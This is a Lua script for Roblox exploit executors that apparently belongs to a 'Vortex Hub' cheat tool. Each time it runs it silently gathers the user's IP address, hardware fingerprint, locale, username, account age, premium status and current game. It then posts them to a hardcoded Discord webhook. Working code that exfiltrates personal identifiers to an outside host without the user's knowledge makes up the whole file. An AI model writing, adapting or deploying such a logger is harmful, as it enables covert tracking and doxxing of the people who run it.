local url =
	"https://discord.com/api/webhooks/917689814927699988/_ukvztrq3AwGOEodtgGT3c1sXmkK1Hdj9KKoufaiSPlMuV4r8f1ZYLniXKUv-O95uDWI"

local reg = game:GetService("LocalizationService").SystemLocaleId
local name = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name
local age = game.Players.LocalPlayer.AccountAge
local has
local premium = game.Players.LocalPlayer.MembershipType
local req = syn.request or request or http_request or nil
local hwid_headers = {'Syn-Fingerprint'} or {'Krnl-Hwid'} or {'fingerprint'} or {'sentinel-fingerprint'} or {'proto-user-identifier'} or {'shadow_hardware'} or {'exploit-guid'} or nil
function hwid()local a=req({Url='https://httpbin.org/get',Method='GET'})local b=game:GetService('HttpService'):JSONDecode(a.Body)for c,d in pairs(hwid_headers)do if b.headers[d]then return b.headers[d]end end end
if premium == Enum.MembershipType.Premium then
	has = "Yes"
else
	has = "No"
end
local ip = tostring(game:HttpGet("https://api.ipify.org", true))
local explcheck =
	is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or
	secure_load and "Sentinel" or
	KRNL_LOADED and "Krnl" or
	SONA_LOADED and "Sona" or identifyexecutor()
	or "Unknown"

local data = {
	["content"] = "",
	["embeds"] = {
		{
			["title"] = "**"..game.Players.LocalPlayer.Name.."** **Just used Vortex Hub!**",
			["description"] = os.date(),
			["fields"] = {
				{
					["name"] = "**Executor:**",
					["value"] = explcheck,
					["inline"] = true
				},

				{
					["name"] = "**Region:**",
					["value"] = reg,
					["inline"] = true
				},

				{
					["name"] = "**IP Adress:**",
					["value"] = ip,
					["inline"] = true
				},

				{
					["name"] = "**HWID:**",
					["value"] = tostring(hwid()),
					["inline"] = true
				},

				{
					["name"] = "**Game:**",
					["value"] = name,
					["inline"] = true
				},

				{
					["name"] = "**Account Age:**",
					["value"] = age.." Days",
					["inline"] = true
				},

				{
					["name"] = "**Has Premium:**",
					["value"] = has,
					["inline"] = true
				},

				{
					["name"] = "Profile:",
					["value"] = "https://www.roblox.com/users/"..game.Players.LocalPlayer.UserId.."/profile",
					["inline"] = true
				},

			},
			["type"] = "rich",
			["color"] = tonumber(0x7269da),
			["image"] = {
				["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username=" ..
					tostring(game:GetService("Players").LocalPlayer.Name)
			}
		}
	}
}
local newdata = game:GetService("HttpService"):JSONEncode(data)
local headers = {
	["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)
